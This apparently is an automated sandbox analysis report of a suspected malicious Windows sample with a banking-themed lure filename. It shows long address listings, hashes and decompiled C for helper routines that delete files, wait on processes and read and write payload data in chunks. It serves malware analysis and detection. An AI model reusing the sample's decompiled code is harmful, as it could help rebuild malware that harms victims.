                                                                                  0x00406f92
                                                                                  0x00406f94
                                                                                  0x00406f94
                                                                                  0x00406f94
                                                                                  0x00406f97
                                                                                  0x00406f9a
                                                                                  0x00406f9a
                                                                                  0x00406fa0
                                                                                  0x00406f3e
                                                                                  0x00406f3e
                                                                                  0x00406f41
                                                                                  0x00000000
                                                                                  0x00406f41
                                                                                  0x00406fa2
                                                                                  0x00406fa2
                                                                                  0x00406fa5
                                                                                  0x00406fa8
                                                                                  0x00406fab
                                                                                  0x00406fae
                                                                                  0x00406fb1
                                                                                  0x00406fb4
                                                                                  0x00406fb7
                                                                                  0x00406fba
                                                                                  0x00406fbd
                                                                                  0x00406fc0
                                                                                  0x00406fd8
                                                                                  0x00406fdb
                                                                                  0x00406fde
                                                                                  0x00406fe1
                                                                                  0x00406fe1
                                                                                  0x00406fe4
                                                                                  0x00406fe8
                                                                                  0x00406fea
                                                                                  0x00406fc2
                                                                                  0x00406fc2
                                                                                  0x00406fca
                                                                                  0x00406fcf
                                                                                  0x00406fd1
                                                                                  0x00406fd3
                                                                                  0x00406fd3
                                                                                  0x00406fed
                                                                                  0x00406ff4
                                                                                  0x00406ff7
                                                                                  0x00000000
                                                                                  0x00406ff9
                                                                                  0x00000000
                                                                                  0x00406ff9
                                                                                  0x00000000
                                                                                  0x00407286
                                                                                  0x00407286
                                                                                  0x0040728a
                                                                                  0x004075b1
                                                                                  0x00000000
                                                                                  0x004075b1
                                                                                  0x00407290
                                                                                  0x00407293
                                                                                  0x00407296
                                                                                  0x0040729a
                                                                                  0x0040729d
                                                                                  0x004072a3
                                                                                  0x004072a5
                                                                                  0x004072a5
                                                                                  0x004072a5
                                                                                  0x004072a8
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00407056
                                                                                  0x00407056
                                                                                  0x00407059
                                                                                  0x004073cb
                                                                                  0x004073cb
                                                                                  0x00000000
                                                                                  0x004073cb
                                                                                  0x00000000
                                                                                  0x00407395
                                                                                  0x00407399
                                                                                  0x004073bb
                                                                                  0x004073be
                                                                                  0x004073c8
                                                                                  0x004073cb
                                                                                  0x004073cb
                                                                                  0x00000000
                                                                                  0x004073cb
                                                                                  0x004073cb
                                                                                  0x0040739b
                                                                                  0x0040739e
                                                                                  0x004073a2
                                                                                  0x004073a5
                                                                                  0x004073a5
                                                                                  0x004073a8
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00407452
                                                                                  0x00407456
                                                                                  0x00407474
                                                                                  0x00407474
                                                                                  0x00407474
                                                                                  0x0040747b
                                                                                  0x00407482
                                                                                  0x00407489
                                                                                  0x00407489
                                                                                  0x00000000
                                                                                  0x00407489
                                                                                  0x00407458
                                                                                  0x0040745b
                                                                                  0x0040745e
                                                                                  0x00407461
                                                                                  0x00407468
                                                                                  0x004073ac
                                                                                  0x004073ac
                                                                                  0x004073af
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00407543
                                                                                  0x00407546
                                                                                  0x00407447
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040717d
                                                                                  0x0040717f
                                                                                  0x00407186
                                                                                  0x00407187
                                                                                  0x00407189
                                                                                  0x0040718c
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00407194
                                                                                  0x00407197
                                                                                  0x0040719a
                                                                                  0x0040719c
                                                                                  0x0040719e
                                                                                  0x0040719e
                                                                                  0x0040719f
                                                                                  0x004071a2
                                                                                  0x004071a9
                                                                                  0x004071ac
                                                                                  0x004071ba
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00407490
                                                                                  0x00407490
                                                                                  0x00407493
                                                                                  0x0040749a
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040749f
                                                                                  0x0040749f
                                                                                  0x004074a3
                                                                                  0x004075db
                                                                                  0x00000000
                                                                                  0x004075db
                                                                                  0x004074a9
                                                                                  0x004074ac
                                                                                  0x004074af
                                                                                  0x004074b3
                                                                                  0x004074b6
                                                                                  0x004074bc
                                                                                  0x004074be
                                                                                  0x004074be
                                                                                  0x004074be
                                                                                  0x004074c1
                                                                                  0x004074c4
                                                                                  0x004074c4
                                                                                  0x004074c4
                                                                                  0x004074c4
                                                                                  0x004074c7
                                                                                  0x004074c7
                                                                                  0x004074cb
                                                                                  0x0040752b
                                                                                  0x0040752e
                                                                                  0x00407533
                                                                                  0x00407534
                                                                                  0x00407536
                                                                                  0x00407538
                                                                                  0x0040753b
                                                                                  0x00407447
                                                                                  0x00407447
                                                                                  0x00000000
                                                                                  0x0040744d
                                                                                  0x00407447
                                                                                  0x004074cd
                                                                                  0x004074d3
                                                                                  0x004074d6
                                                                                  0x004074d9
                                                                                  0x004074dc
                                                                                  0x004074df
                                                                                  0x004074e2
                                                                                  0x004074e5
                                                                                  0x004074e8
                                                                                  0x004074eb
                                                                                  0x004074ee
                                                                                  0x00407507
                                                                                  0x0040750a
                                                                                  0x0040750d
                                                                                  0x00407510
                                                                                  0x00407514
                                                                                  0x00407516
                                                                                  0x00407516
                                                                                  0x00407517
                                                                                  0x0040751a
                                                                                  0x004074f0
                                                                                  0x004074f0
                                                                                  0x004074f8
                                                                                  0x004074fd
                                                                                  0x004074ff
                                                                                  0x00407502
                                                                                  0x00407502
                                                                                  0x0040751d
                                                                                  0x00407524
                                                                                  0x00000000
                                                                                  0x00407526
                                                                                  0x00000000
                                                                                  0x00407526
                                                                                  0x00000000
                                                                                  0x004071c2
                                                                                  0x004071c5
                                                                                  0x004071fb
                                                                                  0x0040732b
                                                                                  0x0040732b
                                                                                  0x0040732b
                                                                                  0x0040732b
                                                                                  0x0040732e
                                                                                  0x0040732e
                                                                                  0x00407331
                                                                                  0x00407333
                                                                                  0x004075bd
                                                                                  0x00000000
                                                                                  0x004075bd
                                                                                  0x00407339
                                                                                  0x0040733c
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00407342
                                                                                  0x00407346
                                                                                  0x00407349
                                                                                  0x00407349
                                                                                  0x00407349
                                                                                  0x00000000
                                                                                  0x00407349
                                                                                  0x004071c7
                                                                                  0x004071c9
                                                                                  0x004071cb
                                                                                  0x004071cd
                                                                                  0x004071d0
                                                                                  0x004071d1
                                                                                  0x004071d3
                                                                                  0x004071d5
                                                                                  0x004071d8
                                                                                  0x004071db
                                                                                  0x004071f1
                                                                                  0x004071f6
                                                                                  0x0040722e
                                                                                  0x0040722e
                                                                                  0x00407232
                                                                                  0x0040725e
                                                                                  0x00407260
                                                                                  0x00407267
                                                                                  0x0040726a
                                                                                  0x0040726d
                                                                                  0x0040726d
                                                                                  0x00407272
                                                                                  0x00407272
                                                                                  0x00407274
                                                                                  0x00407277
                                                                                  0x0040727e
                                                                                  0x00407281
                                                                                  0x004072ae
                                                                                  0x004072ae
                                                                                  0x004072b1
                                                                                  0x004072b4
                                                                                  0x00407328
                                                                                  0x00407328
                                                                                  0x00407328
                                                                                  0x00000000
                                                                                  0x00407328
                                                                                  0x004072b6
                                                                                  0x004072bc
                                                                                  0x004072bf
                                                                                  0x004072c2
                                                                                  0x004072c5
                                                                                  0x004072c8
                                                                                  0x004072cb
                                                                                  0x004072ce
                                                                                  0x004072d1
                                                                                  0x004072d4
                                                                                  0x004072d7
                                                                                  0x004072f0
                                                                                  0x004072f2
                                                                                  0x004072f5
                                                                                  0x004072f6
                                                                                  0x004072f9
                                                                                  0x004072fb
                                                                                  0x004072fe
                                                                                  0x00407300
                                                                                  0x00407302
                                                                                  0x00407305
                                                                                  0x00407307
                                                                                  0x0040730a
                                                                                  0x0040730e
                                                                                  0x00407310
                                                                                  0x00407310
                                                                                  0x00407311
                                                                                  0x00407314
                                                                                  0x00407317
                                                                                  0x004072d9
                                                                                  0x004072d9
                                                                                  0x004072e1
                                                                                  0x004072e6
                                                                                  0x004072e8
                                                                                  0x004072eb
                                                                                  0x004072eb
                                                                                  0x0040731a
                                                                                  0x00407321
                                                                                  0x004072ab
                                                                                  0x004072ab
                                                                                  0x004072ab
                                                                                  0x004072ab
                                                                                  0x00000000
                                                                                  0x00407323
                                                                                  0x00000000
                                                                                  0x00407323
                                                                                  0x00407321
                                                                                  0x00407234
                                                                                  0x00407237
                                                                                  0x00407239
                                                                                  0x0040723c
                                                                                  0x0040723f
                                                                                  0x00407242
                                                                                  0x00407244
                                                                                  0x00407247
                                                                                  0x0040724a
                                                                                  0x0040724a
                                                                                  0x0040724d
                                                                                  0x0040724d
                                                                                  0x00407250
                                                                                  0x00407257
                                                                                  0x0040722b
                                                                                  0x0040722b
                                                                                  0x0040722b
                                                                                  0x0040722b
                                                                                  0x00000000
                                                                                  0x00407259
                                                                                  0x00000000
                                                                                  0x00407259
                                                                                  0x00407257
                                                                                  0x004071dd
                                                                                  0x004071e0
                                                                                  0x004071e2
                                                                                  0x004071e5
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00406f44
                                                                                  0x00406f44
                                                                                  0x00406f48
                                                                                  0x0040758d
                                                                                  0x00000000
                                                                                  0x0040758d
                                                                                  0x00406f4e
                                                                                  0x00406f51
                                                                                  0x00406f54
                                                                                  0x00406f57
                                                                                  0x00406f5a
                                                                                  0x00406f5d
                                                                                  0x00406f60
                                                                                  0x00406f62
                                                                                  0x00406f65
                                                                                  0x00406f68
                                                                                  0x00406f6b
                                                                                  0x00406f6d
                                                                                  0x00406f6d
                                                                                  0x00406f6d
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004070cf
                                                                                  0x004070cf
                                                                                  0x004070d3
                                                                                  0x00407599
                                                                                  0x00000000
                                                                                  0x00407599
                                                                                  0x004070d9
                                                                                  0x004070dc
                                                                                  0x004070df
                                                                                  0x004070e2
                                                                                  0x004070e4
                                                                                  0x004070e4
                                                                                  0x004070e4
                                                                                  0x004070e7
                                                                                  0x004070ea
                                                                                  0x004070ed
                                                                                  0x004070f0
                                                                                  0x004070f3
                                                                                  0x004070f6
                                                                                  0x004070f7
                                                                                  0x004070f9
                                                                                  0x004070f9
                                                                                  0x004070f9
                                                                                  0x004070fc
                                                                                  0x004070ff
                                                                                  0x00407102
                                                                                  0x00407105
                                                                                  0x00407105
                                                                                  0x00407105
                                                                                  0x00407108
                                                                                  0x0040710a
                                                                                  0x0040710a
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040734c
                                                                                  0x0040734c
                                                                                  0x0040734c
                                                                                  0x00407350
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00407356
                                                                                  0x00407359
                                                                                  0x0040735c
                                                                                  0x0040735f
                                                                                  0x00407361
                                                                                  0x00407361
                                                                                  0x00407361
                                                                                  0x00407364
                                                                                  0x00407367
                                                                                  0x0040736a
                                                                                  0x0040736d
                                                                                  0x00407370
                                                                                  0x00407373
                                                                                  0x00407374
                                                                                  0x00407376
                                                                                  0x00407376
                                                                                  0x00407376
                                                                                  0x00407379
                                                                                  0x0040737c
                                                                                  0x0040737f
                                                                                  0x00407382
                                                                                  0x00407385
                                                                                  0x00407389
                                                                                  0x0040738b
                                                                                  0x0040738e
                                                                                  0x00000000
                                                                                  0x00407390
                                                                                  0x0040710d
                                                                                  0x0040710d
                                                                                  0x00000000
                                                                                  0x0040710d
                                                                                  0x0040738e
                                                                                  0x004075c3
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00406bf2
                                                                                  0x004075fa
                                                                                  0x004075fa
                                                                                  0x00000000
                                                                                  0x004075fa
                                                                                  0x00407447
                                                                                  0x004073ce
                                                                                  0x004073cb

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.275199198.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.275194801.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275205932.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.0000000000425000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.0000000000427000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.0000000000435000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275257760.000000000043B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_SWIFT MO104978172_1301 EURO 9700.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: b33066b9a67caffcdb2859c2a3d237c195f810e8b6f417b46283b98aba377de3
                                                                                  • Instruction ID: 947ff9f4813c08031b822263453b6bbc7859602ae013fffc9a74d3363ad91bbb
                                                                                  • Opcode Fuzzy Hash: b33066b9a67caffcdb2859c2a3d237c195f810e8b6f417b46283b98aba377de3
                                                                                  • Instruction Fuzzy Hash: FE713471E04228DBEF28CF98C8547ADBBB1FF44305F15806AD856BB281C778A986DF45
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 41%
                                                                                  			E00405D2C(void* __eflags, WCHAR* _a4, signed int _a8) {
                                                                                  				int _t9;
                                                                                  				long _t13;
                                                                                  				WCHAR* _t14;
                                                                                  
                                                                                  				_t14 = _a4;
                                                                                  				_t13 = E00406133(_t14);
                                                                                  				if(_t13 == 0xffffffff) {
                                                                                  					L8:
                                                                                  					return 0;
                                                                                  				}
                                                                                  				_push(_t14);
                                                                                  				if((_a8 & 0x00000001) == 0) {
                                                                                  					_t9 = DeleteFileW();
                                                                                  				} else {
                                                                                  					_t9 = RemoveDirectoryW(); // executed
                                                                                  				}
                                                                                  				if(_t9 == 0) {
                                                                                  					if((_a8 & 0x00000004) == 0) {
                                                                                  						SetFileAttributesW(_t14, _t13);
                                                                                  					}
                                                                                  					goto L8;
                                                                                  				} else {
                                                                                  					return 1;
                                                                                  				}
                                                                                  			}






                                                                                  0x00405d2d
                                                                                  0x00405d38
                                                                                  0x00405d3d
                                                                                  0x00405d6d
                                                                                  0x00000000
                                                                                  0x00405d6d
                                                                                  0x00405d44
                                                                                  0x00405d45
                                                                                  0x00405d4f
                                                                                  0x00405d47
                                                                                  0x00405d47
                                                                                  0x00405d47
                                                                                  0x00405d57
                                                                                  0x00405d63
                                                                                  0x00405d67
                                                                                  0x00405d67
                                                                                  0x00000000
                                                                                  0x00405d59
                                                                                  0x00000000
                                                                                  0x00405d5b

                                                                                  APIs
                                                                                    • Part of subcall function 00406133: GetFileAttributesW.KERNELBASE(?,?,00405D38,?,?,00000000,00405F0E,?,?,?,?), ref: 00406138
                                                                                    • Part of subcall function 00406133: SetFileAttributesW.KERNELBASE(?,00000000), ref: 0040614C
                                                                                  • RemoveDirectoryW.KERNELBASE(?,?,?,00000000,00405F0E), ref: 00405D47
                                                                                  • DeleteFileW.KERNEL32(?,?,?,00000000,00405F0E), ref: 00405D4F
                                                                                  • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405D67
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.275199198.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.275194801.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275205932.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.0000000000425000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.0000000000427000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.0000000000435000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275257760.000000000043B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_SWIFT MO104978172_1301 EURO 9700.jbxd
                                                                                  Similarity
                                                                                  • API ID: File$Attributes$DeleteDirectoryRemove
                                                                                  • String ID:
                                                                                  • API String ID: 1655745494-0
                                                                                  • Opcode ID: 80ad4dccc83bd5cfbcd7ef077da852fe0cb096cb549a199170c52783d075929e
                                                                                  • Instruction ID: f7500ddcb6900c42920b0fa7cdf939b3a50fd8fb6693fff67202f671924a8b23
                                                                                  • Opcode Fuzzy Hash: 80ad4dccc83bd5cfbcd7ef077da852fe0cb096cb549a199170c52783d075929e
                                                                                  • Instruction Fuzzy Hash: 6DE0E531218A9156C3207734AD0CB5B2A98EF86314F09893FF5A2B11E0D77885078AAD
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 100%
                                                                                  			E00406AE0(void* __ecx, void* _a4) {
                                                                                  				long _v8;
                                                                                  				long _t6;
                                                                                  
                                                                                  				_t6 = WaitForSingleObject(_a4, 0x64);
                                                                                  				while(_t6 == 0x102) {
                                                                                  					E00406A71(0xf);
                                                                                  					_t6 = WaitForSingleObject(_a4, 0x64);
                                                                                  				}
                                                                                  				GetExitCodeProcess(_a4,  &_v8); // executed
                                                                                  				return _v8;
                                                                                  			}





                                                                                  0x00406af1
                                                                                  0x00406b08
                                                                                  0x00406afc
                                                                                  0x00406b06
                                                                                  0x00406b06
                                                                                  0x00406b13
                                                                                  0x00406b1f

                                                                                  APIs
                                                                                  • WaitForSingleObject.KERNEL32(?,00000064), ref: 00406AF1
                                                                                  • WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00406B06
                                                                                  • GetExitCodeProcess.KERNELBASE ref: 00406B13
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.275199198.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.275194801.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275205932.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.0000000000425000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.0000000000427000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.0000000000435000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275257760.000000000043B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_SWIFT MO104978172_1301 EURO 9700.jbxd
                                                                                  Similarity
                                                                                  • API ID: ObjectSingleWait$CodeExitProcess
                                                                                  • String ID:
                                                                                  • API String ID: 2567322000-0
                                                                                  • Opcode ID: c0daa64154bb0774b0f48346674b492318025e1df3185352ae56c24ee987a067
                                                                                  • Instruction ID: dffe0f0baa3edeb4a8159ab808a8d66eaa88359a938bc324e0f181ad12cbd91f
                                                                                  • Opcode Fuzzy Hash: c0daa64154bb0774b0f48346674b492318025e1df3185352ae56c24ee987a067
                                                                                  • Instruction Fuzzy Hash: 36E09236600118FBDB00AB54DD05E9E7B6ADB45704F114036FA05B6190C6B1AE22DA94
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 100%
                                                                                  			E0040620A(void* _a4, void* _a8, long _a12) {
                                                                                  				int _t7;
                                                                                  				long _t11;
                                                                                  
                                                                                  				_t11 = _a12;
                                                                                  				_t7 = WriteFile(_a4, _a8, _t11,  &_a12, 0); // executed
                                                                                  				if(_t7 == 0 || _t11 != _a12) {
                                                                                  					return 0;
                                                                                  				} else {
                                                                                  					return 1;
                                                                                  				}
                                                                                  			}





                                                                                  0x0040620e
                                                                                  0x0040621e
                                                                                  0x00406226
                                                                                  0x00000000
                                                                                  0x0040622d
                                                                                  0x00000000
                                                                                  0x0040622f

                                                                                  APIs
                                                                                  • WriteFile.KERNELBASE(?,00000000,00000000,00000000,00000000,0040FE4F,ebruary,00403579,ebruary,0040FE4F,00414EF0,00004000,?,00000000,004033A3,00000004), ref: 0040621E
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.275199198.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.275194801.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275205932.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.0000000000425000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.0000000000427000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.0000000000435000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275257760.000000000043B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_SWIFT MO104978172_1301 EURO 9700.jbxd
                                                                                  Similarity
                                                                                  • API ID: FileWrite
                                                                                  • String ID: ebruary
                                                                                  • API String ID: 3934441357-2749923991
                                                                                  • Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                                                  • Instruction ID: 398385dbb58ca0a44fa402a726e0ab0b2131cea3ae709c8a1b666252059dd88a
                                                                                  • Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                                                  • Instruction Fuzzy Hash: F6E08632141129EBCF10AE548C00EEB375CFB01350F014476F955E3040D330E93087A5
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 100%
                                                                                  			E004061DB(void* _a4, void* _a8, long _a12) {
                                                                                  				int _t7;
                                                                                  				long _t11;
                                                                                  
                                                                                  				_t11 = _a12;
                                                                                  				_t7 = ReadFile(_a4, _a8, _t11,  &_a12, 0); // executed
                                                                                  				if(_t7 == 0 || _t11 != _a12) {
                                                                                  					return 0;
                                                                                  				} else {
                                                                                  					return 1;
                                                                                  				}
                                                                                  			}





                                                                                  0x004061df
                                                                                  0x004061ef
                                                                                  0x004061f7
                                                                                  0x00000000
                                                                                  0x004061fe
                                                                                  0x00000000
                                                                                  0x00406200

                                                                                  APIs
                                                                                  • ReadFile.KERNELBASE(?,00000000,00000000,00000000,00000000,00414EF0,ebruary,004035F5,?,?,004034F9,00414EF0,00004000,?,00000000,004033A3), ref: 004061EF
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.275199198.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.275194801.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275205932.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.0000000000425000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.0000000000427000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.0000000000435000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275257760.000000000043B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_SWIFT MO104978172_1301 EURO 9700.jbxd
                                                                                  Similarity
                                                                                  • API ID: FileRead
                                                                                  • String ID: ebruary
                                                                                  • API String ID: 2738559852-2749923991
                                                                                  • Opcode ID: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                                                                                  • Instruction ID: 689b8facb1381159ac92aeccc4703b7db47ce2620db9a14c340ec3ef8a35c8b1
                                                                                  • Opcode Fuzzy Hash: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                                                                                  • Instruction Fuzzy Hash: C1E0863250021AABDF10AE518C04AEB375CEB01360F014477F922E2150D230E82187E8
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 92%
                                                                                  			E00403371(void* __ecx, long _a4, void* _a8, void* _a12, long _a16) {
                                                                                  				long _v8;
                                                                                  				long _t21;
                                                                                  				long _t22;
                                                                                  				void* _t24;
                                                                                  				long _t26;
                                                                                  				int _t27;
                                                                                  				long _t28;
                                                                                  				void* _t29;
                                                                                  				void* _t30;
                                                                                  				long _t31;
                                                                                  				long _t32;
                                                                                  				long _t36;
                                                                                  
                                                                                  				_t21 = _a4;
                                                                                  				if(_t21 >= 0) {
                                                                                  					_t32 = _t21 +  *0x42a2b8;
                                                                                  					 *0x420ef4 = _t32;
                                                                                  					SetFilePointer( *0x40a01c, _t32, 0, 0); // executed
                                                                                  				}
                                                                                  				_t22 = E00403479(4);
                                                                                  				if(_t22 >= 0) {
                                                                                  					_t24 = E004061DB( *0x40a01c,  &_a4, 4); // executed
                                                                                  					if(_t24 == 0) {
                                                                                  						L18:
                                                                                  						_push(0xfffffffd);
                                                                                  						goto L19;
                                                                                  					} else {
                                                                                  						 *0x420ef4 =  *0x420ef4 + 4;
                                                                                  						_t36 = E00403479(_a4);
                                                                                  						if(_t36 < 0) {
                                                                                  							L21:
                                                                                  							_t22 = _t36;
                                                                                  						} else {
                                                                                  							if(_a12 != 0) {
                                                                                  								_t26 = _a4;
                                                                                  								if(_t26 >= _a16) {
                                                                                  									_t26 = _a16;
                                                                                  								}
                                                                                  								_t27 = ReadFile( *0x40a01c, _a12, _t26,  &_v8, 0); // executed
                                                                                  								if(_t27 != 0) {
                                                                                  									_t36 = _v8;
                                                                                  									 *0x420ef4 =  *0x420ef4 + _t36;
                                                                                  									goto L21;
                                                                                  								} else {
                                                                                  									goto L18;
                                                                                  								}
                                                                                  							} else {
                                                                                  								if(_a4 <= 0) {
                                                                                  									goto L21;
                                                                                  								} else {
                                                                                  									while(1) {
                                                                                  										_t28 = _a4;
                                                                                  										if(_a4 >= 0x4000) {
                                                                                  											_t28 = 0x4000;
                                                                                  										}
                                                                                  										_v8 = _t28;
                                                                                  										_t29 = E004061DB( *0x40a01c, 0x414ef0, _t28); // executed
                                                                                  										if(_t29 == 0) {
                                                                                  											goto L18;
                                                                                  										}
                                                                                  										_t30 = E0040620A(_a8, 0x414ef0, _v8); // executed
                                                                                  										if(_t30 == 0) {
                                                                                  											_push(0xfffffffe);
                                                                                  											L19:
                                                                                  											_pop(_t22);
                                                                                  										} else {
                                                                                  											_t31 = _v8;
                                                                                  											_a4 = _a4 - _t31;
                                                                                  											 *0x420ef4 =  *0x420ef4 + _t31;
                                                                                  											_t36 = _t36 + _t31;
                                                                                  											if(_a4 > 0) {
                                                                                  												continue;
                                                                                  											} else {
                                                                                  												goto L21;
                                                                                  											}
                                                                                  										}
                                                                                  										goto L22;
                                                                                  									}
                                                                                  									goto L18;
                                                                                  								}
                                                                                  							}
                                                                                  						}
                                                                                  					}
                                                                                  				}
                                                                                  				L22:
                                                                                  				return _t22;
                                                                                  			}















                                                                                  0x00403375
                                                                                  0x0040337e
                                                                                  0x00403387
                                                                                  0x0040338b
                                                                                  0x00403396
                                                                                  0x00403396
                                                                                  0x0040339e
                                                                                  0x004033a5
                                                                                  0x004033b7
                                                                                  0x004033be
                                                                                  0x00403463
                                                                                  0x00403463
                                                                                  0x00000000
                                                                                  0x004033c4
                                                                                  0x004033c7
                                                                                  0x004033d3
                                                                                  0x004033d7
                                                                                  0x00403471
                                                                                  0x00403471
                                                                                  0x004033dd
                                                                                  0x004033e0
                                                                                  0x0040343f
                                                                                  0x00403445
                                                                                  0x00403447
                                                                                  0x00403447
                                                                                  0x00403459
                                                                                  0x00403461
                                                                                  0x00403468
                                                                                  0x0040346b
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x004033e2
                                                                                  0x004033e5
                                                                                  0x00000000
                                                                                  0x004033eb
                                                                                  0x004033f0
                                                                                  0x004033f7
                                                                                  0x004033fa
                                                                                  0x004033fc
                                                                                  0x004033fc
                                                                                  0x00403409
                                                                                  0x0040340c
                                                                                  0x00403413
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040341c
                                                                                  0x00403423
                                                                                  0x0040343b
                                                                                  0x00403465
                                                                                  0x00403465
                                                                                  0x00403425
